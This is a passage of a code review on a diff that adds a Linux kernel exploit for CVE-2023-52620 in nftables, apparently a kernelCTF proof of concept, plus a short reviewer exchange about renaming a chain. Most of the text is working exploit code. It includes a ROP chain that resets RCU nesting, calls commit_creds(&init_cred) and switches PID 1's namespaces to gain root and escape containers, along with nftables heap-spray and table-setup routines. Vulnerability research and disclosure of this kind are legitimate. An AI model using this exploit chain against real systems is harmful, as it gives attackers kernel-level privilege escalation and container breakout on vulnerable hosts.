pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/lts-6.1.78/exploit.c

```diff
@@ -0,0 +1,875 @@
+
+    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = RCU_READ_LOCK_NESTING_OFF;
+    data[i++] = kbase + ADD_RAX_RSI_RET;
+
+    // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+    data[i++] = kbase + POP_RCX_RET;
+    data[i++] = 0;
+    data[i++] = kbase + MOV_RAX_RCX_RET;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = kbase + INIT_CRED;
+    data[i++] = kbase + COMMIT_CREDS;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + POP_RDI_RET;
+    data[i++] = 1;
+    data[i++] = kbase + FIND_TASK_BY_VPID;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + MOV_RDI_RAX_RET;
+    data[i++] = kbase + POP_RSI_RET;
+    data[i++] = kbase + INIT_NSPROXY;
+    data[i++] = kbase + SWITCH_TASK_NAMESPACES;
+
+    data[i++] = kbase + POP_RSP_RET;
+    data[i++] = kmalloc_96 + sizeof(uint64_t);
+}
+
+void spray_counter(){
+    char *set_name;
+
+    for(int i = 0; i < SET_SPRAY; i++){
+        asprintf(&set_name, "s%02hx", i);
+
+        struct nftnl_set * set_leak =  nftnl_set_alloc();
+
+        nftnl_set_set_str(set_leak, NFTNL_SET_TABLE, table1_name);
+        nftnl_set_set_str(set_leak, NFTNL_SET_NAME, set_name);
+        nftnl_set_set_u32(set_leak, NFTNL_SET_KEY_LEN, 1);
+        nftnl_set_set_u32(set_leak, NFTNL_SET_ID, i);
+
+        struct nftnl_expr * expr_counter = nftnl_expr_alloc("counter");
+        nftnl_set_add_expr(set_leak, expr_counter);
+
+        batch = mnl_nlmsg_batch_start(buf, BUF_SIZE);
+
+        nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+        mnl_nlmsg_batch_next(batch);
+
+        nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++);
+        nftnl_set_nlmsg_build_payload(nlh, set_leak);
+        mnl_nlmsg_batch_next(batch);
+
+        handle++;
+
+        nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+        mnl_nlmsg_batch_next(batch);
+
+        if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+            err(1, "mnl_socket_send");
+        }
+    }
+}
+
+void setup_table_chain(){
+    struct nftnl_table * table = nftnl_table_alloc();
+    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table1_name);
+    nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);
+
+    struct nftnl_chain * chain1 = nftnl_chain_alloc();
+    nftnl_chain_set_str(chain1, NFTNL_CHAIN_TABLE, table1_name);
+    nftnl_chain_set_str(chain1, NFTNL_CHAIN_NAME, chain_base_name);
+    nftnl_chain_set_u32(chain1, NFTNL_CHAIN_FLAGS, 0);
+    nftnl_chain_set_str(chain1, NFTNL_CHAIN_TYPE, "filter");
+    nftnl_chain_set_u32(chain1, NFTNL_CHAIN_HOOKNUM, NF_INET_LOCAL_IN);
+    nftnl_chain_set_u32(chain1, NFTNL_CHAIN_PRIO, 10);
+    nftnl_chain_set_u32(chain1, NFTNL_CHAIN_POLICY, NF_ACCEPT);
+
+    struct nftnl_chain * chain_dummy = nftnl_chain_alloc();
```

Comment:
Comment here what this `dummy` chain is used for (and/or choose a more expressive name).

Reply:
I changed the name dummy to delay.